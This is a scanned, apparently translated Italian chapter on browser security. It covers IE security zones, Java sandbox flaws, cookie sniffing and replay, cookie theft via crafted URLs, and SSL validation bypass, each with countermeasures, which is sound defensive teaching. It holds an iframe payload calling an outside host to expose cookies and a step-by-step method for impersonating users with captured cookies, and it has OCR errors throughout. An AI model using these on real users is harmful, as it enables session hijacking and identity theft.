E Una delle fonti di riferimento migliori in relazione alle aree di protezione è 
http://support.microsoft.com. 


È possibile aggiungere manualmente siti a tutte le aree tranne all'area Internet, per- 
ché questa contiene tutti i siti che non hanno corrispondenti in altre aree e qualun- 
que sito che contenga un punto (“.”) nell’URL. Per esempio, http://local è inclu- 
so di default dell’area Intranet locale, mentre http://www.microsoft.com si trova 
nell’area Internet perché contiene punti nel nome. Quando si visita un sito apparte- 
nente a una determinata area, vengono applicate le impostazioni di protezione spe- 
cifiche di quell'area alle attività svolte su quel sito (per esempio, potrebbe essere 
consentita l'esecuzione di controlli ActiveX); l’area Internet è dunque quella più im- 
portante da configurare, in quanto di default contiene tutti i siti che è probabile che 
un utente visiti. Ovviamente, se si aggiungono manualmente siti a qualunque altra 
area, questa regola non si applica; pertanto dovete prestare molta attenzione quan- 
do selezionate i siti attendibili e quelli con restrizioni da aggiungere alle altre aree, 
nel caso in cui decidiate di agire in questo senso. Tipicamente le altre aree saranno 
popolate dagli amministratori di rete per gli utenti di una LAN aziendale. 

Per configurare la protezione dell’area Internet, selezionate la voce di menu Strx- 
menti/Opzioni Internet/Protezione in Internet Explorer (oppure fate doppio clic 
sull'icona Opzioni Internet del Pannello di controllo), selezionate l’area Internet, 
fare clic su Livello predefinito e spostate il dispositivo di scorrimento su un punto 
appropriato. Consigliamo di impostare il livello su protezione Alta e poi di utilizzare 
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il pulsante Livello personalizzato per tornare indietro manualmente e disabilitare il 
rimanente contenuto attivo, oltre ad alcuni altri interventi di messa a punto atti a mi- 
gliorare la fruizione dei siti, come mostrato nella Tabella 16.1. 


Tabella 16.1 Impostazioni consigliate per aree protezione (impostazione livello predefinito su Alta) 


Categoria Nome impostazione Impostazione ‘Commento 
consigliata 
Controlli e Esegui script controlli Disattiva Possono venire sfruttati i 
plug-in ActiveX ActiveX contrassegna- controlli “safe” del client lo- 
ti come sicuri. cale. 
Cookie Consenti cookie (non Attiva Meno sicuro ma più ami- 
memorizzati) sessione chevole con l'utente. 
per sessione. 
Download Download dei file. Attiva IE chiederà automaticamen- 


te di fare il download sulla 

base dell'estensione del file, 
Esecuzione Esecuzione script atti- Attiva Meno sicuro ma più ami- 
script vo. chevole con l'utente, 


La Figura 16.1 mostra l'impostazione necessaria per disabilitare ActiveX. 

L'aspetto negativo è che la disabilitazione di ActiveX può causare problemi nella vi- 
sualizzazione di siti che utilizzano i controlli per produrre effetti speciali. Inizial- 
mente erano molti i siti Web che dipendevano in larga misura da un codice scarica- 
to, come i controlli ActiveX, per offrire funzionalità dinamiche; tuttavia questa ten- 
denza è stata ampiamente sostituita dal ricorso alle estensioni del linguaggio HTML 
e dall'impiego di script sul server. La disabilitazione di ActiveX non influisce quindi 
sulla fruibilità della maggior parte dei siti Web come accadeva in passato. Un'ecce- 
zione a questo sono i siti che si servono del controllo ActiveX Shockwave di Macro- 
media, perché in questo caso la disabilitazione delle funzionalità ActiveX causa la 
visualizzazione del messaggio mostrato nella figura seguente. 


Microsoft Internet Explorer 


Se pensate di non poter fare a meno dei suoni e delle animazioni di Shockwave, 
dovete abilitare ActiveX, a meno che ovviamente non optiate per utilizzare il brow- 
ser di Netscape, che offre le funzionalità Shockwave sotto forma di plug-in. Un altro 
sito molto legato ad ActiveX e che molto probabilmente verrà visitato dalla maggior 
parte degli utenti è WU (Windows Update) di Microsoft, che ricorre ad ActiveX per 
analizzare il computer dell’utente e scaricare e installare le patch necessarie. WU è 
un'ottima idea, perché consente di risparmiare molto del tempo necessario a reperi- 
re le singole patch (in particolare quelle relative alla sicurezza) e determina automa- 
ticamente se la versione installata è quella corretta. Tuttavia non pensiamo che 
quest’unico sito, pur molto utile, riesca da solo a giustificare la scelta di lasciare 
sempre abilitata la possibilità di eseguire i controlli ActiveX. Ancora più frustrante, 
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Intranet locale Siti attendibili Siti con 


restrizioni 


Esegui controlli e plug-in ActiveX 
O Attiva 
O Autorizzazione amministratore 
O Chiedi conferma È 
© Disattiva 
[9 Esegui script controlli ActiveX contrassegnati come sicui 
O Attiva 
© Chiedi conferma 
@ Disattiva 
Inizializza e esegui script controlli ActiveX non contrasse 
O attiva 
O Chiedi conferma 
@ Disattiva 


ITA Coorico 


Figura 16.1 


Disabilitare tutte le impostazioni di ActiveX usando Opzioni Internet del Pannello 
di controllo proteggerà contro controlli nocivi scaricati attraverso pagine Web nemiche. 


quando il contenuto attivo è disabilitato in Internet Explorer, il meccanismo di ricer- 
ca automatica che permette di digitare un indirizzo come “mp3” affinché il browser 
porti a http: //www.mp3.com non funziona. 

Una soluzione a questo problema è abilitare manualmente ActiveX quando si visita 
un sito affidabile per poi disabilitarlo nuovamente; tuttavia la contromisura più in- 
telligente è utilizzare l’area di protezione Siti attendibili. Assegnate un livello di pro- 
tezione inferiore a quest'area (consigliamo Media) e aggiungetevi i siti che conside- 
rate attendibili, come WU (windowsupdate.microsoft.com). In questo modo, 
quando visitate il sito WU vengono applicate le impostazioni di protezione meno 
restrittive e le funzioni ActiveX del sito possono svolgere il loro compito. Analoga- 
mente l’aggiunta di auto. search.msn.com a Siti attendibili permetterà di impostare 
adeguatamente la protezione in modo da consentire le ricerche dalla barra degli in- 
dirizzi. Sono o non sono comode le aree di protezione? 


tendibili, perché vi saranno minori limitazioni al contenuto attivo scarica- 
to ed eseguito. È bene che sappiate che anche siti dall'aspetto molto rispetta- 
bile sono stati compromessi da hacker, oppure potrebbero essere stati realiz- 
zati da qualche sviluppatore poco raccomandabile con l'intenzione di rac- 
cogliere informazioni sugli utenti (0 peggio). 


? M Dovete essere certi di assegnare solo siti altamente affidabili all'area Siti at- 
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Anche in Outlook/Outlook Express potete assegnare un comportamento simile a quel- 
lo delle aree in modo da poter leggere la posta in modo sicuro, Con Outlook/Outlook 
Express selezionate l’area che desiderate applicare al contenuto visualizzato nel pro- 
gramma di lettura della posta, che può essere l’area Internet o l’area Siti con restrizioni. 
Ovviamente consigliamo di impostarla su Siti con restrizioni (il nuovo aggiornamento 
alla protezione di Outlook 2000 lo imposta automaticamente): accertatevi che sia con- 
figurata l’area Siti con restrizioni per disabilitare tutto il contenuto attivo. Questo signi- 
fica impostare la protezione su Alta e poi utilizzare il pulsante Personalizza livello per 
tornare indietro e disabilitare manualmente tutto quello che viene lasciato aperto da 
questa impostazione (oppure per impostarlo su protezione elevata se non è prevista la 
disabilitazione). La Figura 16.2 mostra come impostare Outlook su Siti con restrizioni. 


Figura 16.2 
Impostazione di Outlook per utilizzare la zona Siti con restrizioni quando si deve navigare. 


Come avviene con Internet Explorer, l'impostazione di Outlook sul livello più restritti- 
vo comporta gli stessi svantaggi: occorre tuttavia sottolineare che il contenuto attivo 
disturba maggiormente quando arriva sotto forma di messaggio di posta elettronica e 
i pericoli legati alla sua interpretazione sono di gran lunga superiori ai vantaggi esteti- 
ci. Se non ci credete, continuate a leggere. L'aspetto migliore delle aree di protezione 
è la possibilità di impostare Outlook in modo che si comporti con maggiore attenzio- 
ne rispetto alle operazioni consentite al browser Web. La flessibilità equivale a una 
maggiore protezione, se sapete come configurare il vostro software. 


Problemi di sicurezza di Java 


Un bel giorno, negli anni Novanta, Sun Microsystems decise di creare un metodo di 
programmazione che risolvesse molti dei problemi che i programmatori si erano da 
sempre trovati ad affrontare. Il risultato di questo sforzo venne chiamato Java e ci si 
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accorse che risolveva molti dei problemi di protezione tradizionali dei programma- 
tori. Basandosi in gran parte sull'idea che sia stato progettato da zero per essere a 
prova di bomba (e grazie a un notevole impegno di marketing da parte di Sun), 
sono in molti a credere che Java sia sicuro al 100%. Ovviamente però questo è im- 
possibile. Occorre anzi segnalare che Java non accresce in modo sostanziale il livel- 
lo di sicurezza (la trattazione che segue riguarda l'architettura di Java 2, o JDK 1.2, la 
versione corrente al momento della stesura di questo testo). 

Java è un linguaggio ben congegnato che impedisce ai programmatori di commette- 
re molti degli errori che causano problemi di protezione, come i buffer overflow. La 
rigida tipizzazione del linguaggio è rafforzata in fase di compilazione e di esecuzio- 
ne dalla TVM (Java Virtual Machine) e dal suo verificatore di bytecode incorporato, 
che protegge le aree della memoria cui il programma può accedere. Il linguaggio 
Java inoltre non permette di accedere o manipolare direttamente gli indirizzi di me- 
moria per mezzo di “puntatori”, che consentono ai programmatori di supporre in 
modo programmatico dove inserire comandi nel codice in esecuzione. 

La JVM ha anche un Security Manager integrato che impone il controllo di accesso 
sulle risorse di sistema in base a un criterio di protezione che può essere definito 
dall'utente. Insieme alla verifica dei tipi, questi concetti costituiscono la “sandbox” che 
impedisce al codice Java di eseguire operazioni privilegiate senza l'esplicito consenso 
dell'utente. A coronamento di tutto questo, Java implementa la firma del codice per 
offrire una prova più certa dell’attendibilità del codice proveniente da fonti esterne: 
gli utenti possono quindi decidere se eseguire o meno il codice in base all'affidabilità 
della firma, in modo analogo a quanto avviene con Authenticode. 

Infine, la specifica di Java è stata resa pubblica e può essere analizzata da chiunque 
all'indirizzo http://java.sun.com; questa è un'apertura alla critica e all'analisi che 
dovrebbe offrire una maggiore selezione darwiniana nei confronti dei punti deboli 
del progetto. 

In teoria questi meccanismi sono estremamente difficili da aggirare, al punto che 
molti di essi si sono dimostrati formalmente sicuri. In pratica, tuttavia, la sicurezza di 
Java è stata violata diverse volte a causa dell'annoso problema di un'implementazio- 
ne non conforme ai principi di progettazione. Per trovare una valida visione d’insie- 
me della storia della sicurezza di Java da una prospettiva reale, fate riferimento alla 
pagina SIP (Secure Internet Programming) della Princeton University all'indirizzo 
http://www.cs.princeton.edu/sip/history/index.php3. Di seguito analizzere- 
mo alcuni dei più recenti problemi d’implementazione di Java che si sono dimostra- 
ti particolarmente rilevanti per gli utenti che operano sul lato client. 


n Come fonte di riferimento definitiva per la sicurezza di Java, consultate le 
Ro Java Security FAQ all'indirizzo http://java.sun.com/sfag/index.html. 


® Bug della Java Virtual Machine 
di Netscape Communicator 


Diffusione: A 
Semplicità: 1 
Impatto: 7 
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Nell'aprile del 1999, Karsten Sohr dell’Università di Marburgo in Germania scoprì un 
difetto all’interno di un componente di protezione fondamentale della JVM di Net- 
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scape Communicator: in alcune circostanze la Java Virtual Machine non riusciva a 
controllare tutto il codice che veniva caricato al suo interno, il che consentiva a un 
eventuale hacker esterno di eseguire il codice che violasse i meccanismi di sicurez- 
za dei tipi di Java, dando origine al cosiddetto attacco con confusione dei tipi. Que- 
sto è un classico esempio dei problemi legati alle differenze tra implementazione e 
progetto iniziale di cui si parlava in precedenza. 


© Disabilitazione di Java in Netscape 


Aggiornate il browser con la versione più recente fornita da Netscape, oppure disa- 
bilitate le funzioni Java nel modo descritto di seguito (Figura 16.3). 

1. In Communicator, selezionate Edit/Preferences. 

2. Nella finestra di dialogo Preferences, scegliete la categoria Advanced. 

3. Deselezionate la preferenza Enable fava nella finestra di dialogo. 

4. Fate clic su OK. 
Siamo convinti che lasciare abilitato l'interprete JavaScript possa essere accettabile, 
considerando anche che il suo impiego nei siti Web è ormai talmente diffuso che la 
sua disattivazione creerebbe problemi molto seri. Tuttavia consigliamo vivamente 
di disabilitare JavaScript nei client Mail e News di Netscape, come mostrato nella Fi- 
gura 16.3. Per ulteriori informazioni visitate l'indirizzo http://www. netscape. 
com/security/notes/sohrjava.html. 


E) Appearance 
Fonts 
Colors 


Navigator 
Languages 
Applications 
Smart Browsing 

E} Mail & Newsgroups 
E Roaming Access 


SmartUpdate 


ÎV_Automatically load images 
TT EnableJava 
F Enable JavaScript 
TT Enable JavaScript fot Mail and News 
TV Enable style sheets 
TT Sendemail address as anonymous FTP passward | 


n Cookies liti iii iii liaison iii 


C Accepi all cookies 
© ficcepi gnly coohkies thai get sent back io the originating servei 
( Disable cookies 


MW _Wam me before accepting a cookie 


Figura 16.3 


Disabilitare Java in Communicator di Netscape protegge dalle applet nocive di Java; 
al contrario JavaScript è sicuro, ma si consiglia di farlo nei client Mail e News. 
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‘| Difetti della Sandbox Java di Microsoft 
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Il browser IE di Microsoft è stato colpito da un bug simile poco tempo dopo. A cau- 
sa di alcuni difetti nell’implementazione della sandbox della JVM di Microsoft, i 
meccanismi di protezione di Java potevano essere completamente aggirati da 
un’applet scritta con intenti dolosi ospitata da un server Web remoto o incorporata 
in un messaggio di posta elettronica in formato HTML, 


Aggiornamento per Microsoft Internet Explorer 


Per vedere se siete vulnerabili, aprite una finestra con il prompt dei comandi e digi- 
tate jview. Controllate poi il numero della build (le ultime quattro cifre del numero 
di versione) e verificate in quale delle seguenti categorie rientra. 


Versione Stato 

1520 o precedente Non affetta da vulnerabilità 
2000-2438 Affetta da vulnerabilità 
3000-3167 Affetta da vulnerabilità 


Non sorprendetevi se jview vi indica che siete vulnerabili anche se IE non è instal- 
lato: esistono altri prodotti, come Microsoft Visual Studio, che installano la JVM. 
Mentre scrivevamo queste parole ci siamo accorti noi stessi, con una certa sorpresa, 
che era in esecuzione una versione vulnerabile della JVM installata con Internet 
Explorer 5.0, quasi un anno dopo il rilascio della patch! 

La patch è stata denominata Aggiornamento della Virtual Machine Sandbox ed è di- 
sponibile nella pagina principale dedicata alle patch per IE all'indirizzo http:// 
Wwww.microsoft.com/windows/ie/download/default.asp. 

Potreste anche considerare l'ipotesi di disabilitare completamente Java per avere un 
livello di sicurezza quasi assoluto, tuttavia in questo caso potreste non riuscire a 
consultare i siti Web che si servono delle applet Java (le applet sono programmi 
Java eseguiti sul client). Per disabilitare Java in IE, seguite la procedura delineata in 
precedenza in relazione alle aree di protezione di TE e disabilitate manualmente 
qualunque impostazione che faccia riferimento a Java dopo aver impostato su Alta 
il livello di protezione dell’area Internet. 


O Brown Orifice e altri bug di Java 
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Nel corso dell'estate del 2000, Dan Brumleve annunciò di aver scoperto due difetti 
nell’implementazione di Java di Netscape Communicator. In particolare, egli identi- 
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ficò alcuni problemi con le librerie di file di classi Java di Netscape che non riusci- 
vano a eseguire i controlli di protezione adeguati, o ignoravano i risultati di tali con- 
trolli, nell'esecùzione di operazioni delicate. Tra le classi incriminate c'erano java. 
net.ServerSocket, che crea socket di rete in ascolto sui quali accettare connessio- 
ni di rete, e le classi netscape.net.URLConnection e netscape.net.URLInput- 
Steam, che si sottraggono ai metodi Java standard per la lettura di file locali. In tutti 
e tre i casi, queste classi contenevano metodi che non richiamavano il metodo Se - 
curityManager.check appropriato per determinare se un'applet ha davvero le au- 
torizzazioni necessarie per eseguire certe operazioni, o che ignoravano l'eccezione 
risultante se il controllo falliva. 

Lo sfruttamento di questi difetti in combinazione è possibile scrivendo un'applet 
Java che chiama questi metodi per creare una porta in ascolto e per abilitare l’acces- 
so in lettura al file system. Dan scrisse il codice Java necessario e lo pubblicò sul 
suo sito per fornire un esempio pratico di come fosse possibile utilizzare queste vul- 
nerabilità per attaccare dei browser casuali su Internet. Egli impostò un modulo che 
consentiva agli utenti di selezionare la directory che desideravano condividere e le 
porte sulle quali volevano rimanere in ascolto: queste informazioni venivano inviate 
con l'istruzione POSTed a uno script CGI Perl, che richiamava le classi Java perso- 
nalizzate di Dan per condividere la cartella specificata e creare la porta in ascolto 
collegata a essa sul lato del client. 

Mostrando di avere molto senso dell'umorismo, Dan promosse le caratteristiche di 
questa tecnica, segnalando la possibilità di sfruttarle per dare vita a un servizio simile 
a quello di Napster e consentire agli utenti di condividere file su una rete peer-to- 
peer costituita da milioni di utenti che condividono i loro dischi tramite HTTP. Tutta- 
via, questo problema non deve essere sottovalutato per il semplice fatto che permette 
solo l’accesso in lettura ai dati. L'attacco di Dan consente agli utenti di specificare qua- 
le directory desiderano condividere. Potrebbero tuttavia essere realizzate applet deci- 
samente più infide, in grado di lavorare in modo molto più furtivo per esporre chiun- 
que utilizzi Netscape alla possibile divulgazione di informazioni riservate. 


Contromisure a Brown Orifice 


Come di consueto, l’unico modo per essere al sicuro dalle applet Java maligne è di- 
sabilitare Java nel browser Web. La procedura per impostare Netscape in questo 
modo è stata descritta in precedenza nel paragrafo “Disabilitazione di Java in Net- 
scape” e nella Figura 16.3. Raccomandiamo questa impostazione per gli utenti di 
Netscape. 

Netscape non aveva ancora fornito alcuna correzione specifica al momento di anda- 
re in stampa, in base alle notizie presenti alla pagina http://ww.netscape. 
com/security/notes/index.html. Questa vulnerabilità interessa il browser Com- 
municator dalla versione 4.0 alla 4.74 per i sistemi operativi Windows, Macintosh e 
UNIX, mentre invece non pare essere presente in Netscape 6. 


Attenti ai cookie 


Vi siete mai chiesti in che modo alcuni siti Web siano in grado di personalizzare le 
vostre visite, per esempio ricordando il contenuto di un carrello o magari compilan- 
do automaticamente il campo relativo al metodo di spedizione preferito? Il proto- 
collo sul quale si fonda il World Wide Web, HTTP, non dispone di una funzione 
che permetta di tenere traccia di quanto accade tra una visita e l’altra, pertanto è sta- 
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ta escogitata un'estensione che permetta di mantenere questo “stato” anche con ri- 
chieste e risposte HTTP diverse, Il meccanismo, descritto nella RFC 2109, ha portato 
alla nascita dei cookie e dei token speciali, contenuti nelle richieste e risposte HTTP 
che permettono ai siti Web di riconoscere gli utenti che tornano a far visita a un si- 
to. I cookie possono essere impostati sessione per sessione, nel qual caso rimangono 
nella memoria volatile e scadono alla chiusura del browser o in base a un tempo di 
scadenza impostato; oppure possono essere permanenti, nel qual caso risiedono 
sul disco fisso dell’utente sotto forma di file di testo, in genere in una cartella deno- 
minata “Cookies” (tipicamente %windir%\Cookies in Win9x, o %userprofile%\Coo- 
kies in ambiente NT/2000). Come potete immaginare, degli hacker che riuscissero a 
mettere le mani sui vostri cookie potrebbero essere in grado di contraffare la vostra 
identità online o raccogliere informazioni riservate memorizzate nei cookie. Conti- 
nuate a leggere per vedere quanto sia facile fare una cosa del genere. 


® Snarfing dei cookie 


Diffusione: 7 
Semplicità: S 
Impatto: 2 
Fattore di rischio: 5 


Il metodo a forza bruta per intercettare i cookie consiste nell'utilizzo di uno sniffer 
sulla rete per catturarli e poi riprodurli sul server. Qualsiasi vecchio strumento per 
l’intercettazione dei pacchetti è in grado di svolgere questo compito, tuttavia uno 
dei migliori per lo snarfing dei cookie è SpyNet/PeepNet di Laurentiu Nicula (cerca- 
te negli archivi di http://Ww.packetstormsecurity.com per trovare questa gem- 
ma preziosa). SpyNet è costituito da due strumenti che agiscono di concerto: il pro- 
gramma CaptureNet effettua la vera e propria cattura dei pacchetti e li salva su di- 
sco, mentre lo strumento PeepNet apre il file di cattura per ricostruire le sessioni in 
forma leggibile. PeepNet può effettivamente riprodurre una sessione di navigazione 
Web proprio come se foste voi l'utente monitorato. L'esempio che segue è un fram- 
mento della ricostruzione effettuata da PeepNet di una sessione che utilizza l’auten- 
ticazione tramite cookie per controllare l’accesso a pagine personalizzate (i nomi 
sono stati cambiati per proteggere la vittima): 


GET http://ww.victim.net/images/logo.gif HTTP/1.0 
Accept: */* 

Referrer: http://ww.victim.net/ 

Host: ww.victim.net 

Cookie: jrunsessionid=9611402427B141622; 
cuid=TORPMIZXTFRLR1pWTVFISEblahblah 


Potete tranquillamente vedere il token cookie fornito in questa richiesta HTTP in- 
viata al server. La parte importante è cuid=, che riporta un identificatore unico uti- 
lizzato per autenticare questo utente sul sito ww.victim.net. Supponiamo che 
l'hacker ora visiti victim.net, crei il proprio ID di login e riceva il proprio cookie. 
Dato che victim.net imposta dei cookie permanenti scritti in file memorizzati sul di- 
sco (invece di cookie attivi solo per la sessione in corso che vengono memorizzati 
nella memoria volatile), l'hacker può aprire il proprio cookie e sostituire la voce 
cuid= con quella intercettata. Riconnettendosi a victim.net l'hacker è ora in grado di 
assumere l'identità del cliente originale. 
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La capacità di PeepNet di riprodurre un'intera sessione o di selezionare porzioni di 
essa rende molto più semplice questo tipo di attacco. Per mezzo del pulsante Go Get 
It! è possibile recuperare tutte le pagine effettivamente visualizzate da un utente utiliz- 
zando lo stesso cookie intercettato in precedenza da CaptureNet. La Figura 16.4 illustra 
come con PeepNet sia possibile visualizzare gli ordini completati da un utente sfruttan- 
do il cookie intercettato da CaptureNetr (osservate nel riquadro in basso a destra la no- 
tazione cookie, che riporta rispettivamente i cookie di sessione e di autenticazione). 


[. PeepNet v3 12 - james_bondwell. cap 


10:49:28:713 172.30.177 tomatoe 
1 10:49:28:903 17230,177... tomatoe 


Search! x 


Home 


Order ID Order Date OrderTotal Ship Date 


eg rsciaa 5) | $164.00 [6/24/2000] | 
Deception 
Pr 


GET /ibuyspy2/CheckOut.aspx?CartID=gf55tqfhkof45xfhaSai2z55 KH 

Accept: */* 

Referer: http://tomatoes/ibuyspy2/ShoppingCart.aspx 

Accept-Language: en-us 

Accept-Encoding: gzip, deflate 

User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windovs 98; Wi 

Host: tomatoes 

Connection: Keep-Alive 

Cookie: AspSessionId=gfSS5Stgfhkor45xfha5ai2z55; -A SETA TO or 
D 


[or 


Figura 16.4 
Un cookie registrato da CaptureNet e nutilizzato in PeepNet. 


Questo è un trucco piuttosto elegante. CaptureNet è anche in grado di presentare 
una decodifica completa del traffico registrato quasi equivalente all’output di stru- 
menti di analisi dei protocolli professionali come SnifferPro di Network Associates, 
Inc. Inoltre, SpyNet è gratuito! 


© Contromisure: strumenti per il controllo dei cookie 


State attenti ai siti che utilizzano i cookie per l'autenticazione e la memorizzazione 
di dati personali riservati. Uno strumento utile in questo senso è Cookie Pal di Koo- 
kaburra Software, disponibile all'indirizzo http://www.kburra.com/cpal.html, 
che può essere impostato per avvisarvi quando i siti Web tentano di impostare i 
cookie, permettendovi di vedere che cosa accade dietro le quinte in modo da poter 
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decidere se permettere o meno tale attività. Microsoft Internet Explorer ha una fun- 
zione di controllo dei cookie, disponibile nella finestra di dialogo Opzioni Internet, 
scheda Protezione/Area Internet/Personalizza livello/“Chiedi conferma”, per i coo- 
kie sessione per sessione e quelli permanenti memorizzati sul disco. Nelle versioni 
di Internet Explorer successive alla 6, la finestra di dialogo Opzioni Internet si è ar- 
ricchita con molte impostazioni avanzate per la gestione dei cookie, rintracciabili 
nella scheda Privacy. Il browser di Netscape permette di impostare il comporta- 
mento relativo ai cookie facendo clic su Edit/Preferences/Advanced e selezionando 
Warn me before accepting a cookie o Disable cookies (Figura 16.3). Nel caso in cui 
accettiate cei cookie, verificate se vengono scritti sul disco per vedere se il sito me- 
morizza informazioni personali che vi riguardano. 

Inoltre ricordatevi, nel caso in cui visitiate un sito che utilizza i cookie per l’autenti- 
cazione, che esso quanto meno dovrebbe utilizzare SSL per cifrare l'invio iniziale di 
nome utente e password in modo che non appaia in chiaro in PeepNet. 

Noi preferiremmo disabilitare completamente i cookie, tuttavia molti dei siti che fre- 
quentiamo spesso richiedono che siano abilitati. Per esempio, il famoso servizio 
Hotmail di Microsoft richiede l'attivazione dei cookie per poter accedere al servizio 
e poiché Hotmail si appoggia a diversi server di autenticazione che possono variare 
da una sessione all'altra, non è sufficiente aggiungere Hotmail all'area Siti attendibi- 
liin Opzioni Internet (come abbiamo descritto in precedenza nel paragrafo relativo 
alle aree di protezione). In questo caso una soluzione potrebbe essere l'utilizzo 
della notazione *.hotmail.com. I cookie sono una soluzione imperfetta alle inade- 
guatezze di HTTP, tuttavia le alternative sono probabilmente peggiori (come per 
esempio l'aggiunta di un identificatore agli URL che può essere memorizzato nei 
proxy). Fino a quando qualcuno non proporrà un’idea migliore, l’unica soluzione è 
tenere sotto controllo i cookie con gli strumenti indicati in precedenza. 


) Sottrazione dei cookie tramite URL nocivi 
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Ecco un’idea inquietante: facendo semplicemente clic su un URL costruito ad arte, 
gli utenti di IE sono potenzialmente vulnerabili alla rivelazione dei loro cookie. 
Bennett Haselton e Jamie McCarthy di Peacefire hanno pubblicato uno script alla 
pagina http://ww.peacefire.org/security/iecookies che trasforma in realtà 
questa ipotesi, in quanto estrae i cookie dalla macchina del client semplicemente fa- 
cendo clic su un collegamento contenuto nella pagina. Il contenuto dei cookie pre- 
senti sulla macchina dell'utente è leggibile da parte di questo script e pertanto risul- 
ta accessibile agli operatori del sito Web. 

Questo script potrebbe anche essere sfruttato per finalità decisamente poco deside- 
rabili inviandolo all’interno di tag di frame inline (iframe) incorporati nel codice 
HTML di una pagina Web (oppure in messaggi di posta elettronica o di newsgroup 
in formato HTML), L'esempio seguente, suggerito dal consulente esperto di sicurez- 
za Internet Richard M. Smith, mette in luce come sia possibile utilizzare iframe in 
combinazione con l’attacco di Peacefire per impadronirsi dei cookie di un utente: 


<iframe sre="http://ww.peacefire.org%2fsecurity%2fiecookies%2f 
showcookie.htm1%3f.yahoo.com/"></iframe> 
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argomento che può incutere una certa soggezione in chi sta iniziando solo ora ad 
accostarsi ai problemi della protezione, ma che mttavia è un concetto fondamentale 
per chiunque desideri acquistare e vendere merci nel mondo dell'economia moder- 
na. Una buona descrizione generale del funzionamento di SSL è disponibile alla pa- 
gina http://home.netscape.com/security/techbriefs/ssl.html. 

SSL tuttuvia è una specifica di protezione e come tale è aperta all'interpretazione da 
parie di coloro che la implementano nei loro prodotti software. Come abbiamo avu- 
to modo di rilevare in precedenza, tra il dire e il fare c'è di mezzo il mare, ossia i di- 
ferti di implementazione possono ridurre notevolmente, se non addirittura annulla- 
re, la sicurezza di qualunque specifica. Di seguito quindi ci occuperemo proprio di 
questo difetto di implementazione. 

Prima però permetteteci un consiglio: i lertori dovrebbero cercare di procurarsi il siste- 
ma di crinografia SSL più potente disponibile per il loro browser Web, quello che utiliz- 
za la cifratura a 128 bit. Grazie all'attenuazione delle leggi sull'esportazione degli Stati 
Uniti, le versioni a 128 bit di Netscape e IE sono disponibili a chiunque dimori in un 
paese che nun sia soggetto a qualche forma di embargo. In TE aprite la finestra di dialo- 
go Informazioni su Internet Explorer e fate clic sul collegamento Update Information 
per aprire la pagina dalla quale potete ottenere la versione a 128 bit. Gli utent di Net- 
scape invece possono collegarsi alla pagina di download principale http://home.net- 
scape.com/download e cercare il riferimento alla crittografia a 128 bit. 


© Possibilità di aggirare la convalida 
del certificato SSL del browser Web 
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Questo problema implica la contraffazione del certificato SSL di un sito Web legittimo, 
che normalmente verrebbe invalidato tramite un controllo incrociato dell'identità del 
certificato con il nome DNS e l’indirizzo IP del server all’altro capo della connessione. 
Ciò è quanto avviene in base alla specifica SSL. Tuttavia l'’ACROS Securiry Team of 
Slovenia scoprì un difetto di implementazione nelle versioni di Netscape Communica- 
tor antecedenti alla 4.73, nelle quali, al momento di stabilire una sessione SSL, Com- 
municator confrontava solo l'indirizzo TP, e non il nome DNS, di un certificato con i 
dati celle sessioni SSL esistenti. Riuscendo a ingannare surrettiziamente un browser, 
in modo da convincerlo ac aprire una sessione SSL con un server Web dalle intenzio- 
ni dolose e contraffatto da server legittimo, tutte le sessioni SSL successive con il ser- 
ver Web legittimo verrebbero in realtà dirottate verso il server dell'hacker, senza che 
all'utente compaia nessuno dei normali messaggi di avvertimento. 

In effetti ci rendiamo conto che è un rompicapo. Per una spiegazione più esauriente, 
fare riferimento all'annuncio originale del team di ACROS riportato nel CERT Advisory 
2000-05 alla pagina http://www. cert.org/advisories/CA-2000-05.html Ginche se 
il loro esempio con Verisign e Thawte contiene indirizzi IP non aggiornati). Vale co- 
munque la pena di comprendere le possibili implicazioni di questa vulnerabilità, indi- 
pendentemente dall'inprobabilità che tutte le variabili necessarie al suo funziona- 
mento si allineino. Quasi tutti danno per scontato cli non doversi più preoccupare una 
volta che nel browser appare la piccola icona di SSL. ACROS ha invece mostrato che 
questo è impossibile, almeno fino a quando saranno gli esseri umani a sviluppare il 
software. 
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Il team di ACROS mise in luce una vulnerabilità simile in IE, con la differenza che in 
questo caso il problema era che il browser verificava soltanto che il certificato fosse 
stato emesso da una Certificate Authority valida, senza preoccuparsi di controllare il 
nome del server o la data di scadenza. Questo avveniva soltanto quando la connes- 
sione SSL al server SSL avveniva tramite un frame o un'immagine (che è un modo 
subdolo per impostare sessioni SSL non appariscenti che l'utente potrebbe non no- 
tare). IE inoltre falliva nella riconvalida del certificato nel caso in cui venisse stabilita 
una nuova sessione SSL con lo stesso server nel corso della medesima sessione di 
navigazione del browser. 


Contromisure all’aggiramento 
della protezione SSL dei browser Web 


Come abbiamo indicato, l'aggiornamento alla versione 4.73 0 successive di Communi- 
cator allevia questo problema (http://home.netscape.com/download). Gli utenti di 
TE troveranno invece informazioni sulla patch consultando la pagina http://ww.mi - 
crosoft.com/technet/security/bulletin/ms00-039.asp. 

Ovviamente l’unico modo per essere certi della legittimità del certificato di un sito è 
verificare manualmente il certificato presentato al browser. In Netscape o IE è suffi- 
ciente fare clic sulla piccola icona del lucchetto nella parte inferiore del browser per 
svolgere questa funzione; potete anche arrivare a queste informazioni facendo clic 
sul pulsante Security della barra degli strumenti di Netscape, mentre in TE potete 
fare clic sull'icona del lucchetto oppure selezionare File/Proprietà mentre visitate 
una pagina protetta da SSL, per visualizzare le informazioni sul certificato, La Figura 
16.6 mostra la visualizzazione del certificato di un sito Web molto noto in IE. 


i E Informazioni sul certificato 


Scopo certificato: 
+Garantisce l'identità di un computer remoto 


Rilasciato a: WWW}. AMAZON.COM 


Rilasciato da Secure Server Certification Authority 


Valido dal 19/02/2003 al 20/02/2004 


Figura 16.6 


Il certificato SSL di un server in IE. Assicuratevi che questa informazione 
sia come ve l'aspettate, quando visitate i server SSL-ized. 
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Ci sono due impostazioni in IE che aiutano gli utenti a verificare automaticamente 
se il certificato SSL di un server è stato revocato: Verifica revoca dei certificati del 
server e Verifica revoca dei certificati dell'autore e sì trovano in Strumenti/Opzioni 
Inierne/Avanzate/Protezione. 


Hacking della posta elettronica 


La maggior parte degli utenti identifica Intemet con la sua interfaccia più appari- 
scente, il World Wide Web. È vero però che il volume di messaggi di posta elettro- 
nica inviati su Internet ogni giorno, probabilmente, è molto superiore alla quantità 
di traffico Web. La posta elettronica è pertanto la via più efficace per penetrare nello 
spazio informatico dell'utente di Internet. È l'intersezione di questi due diffusissimi 
protocolli Iniemet, HTTP e SMTP, a far aumentare in modo incredibile il potenziale 
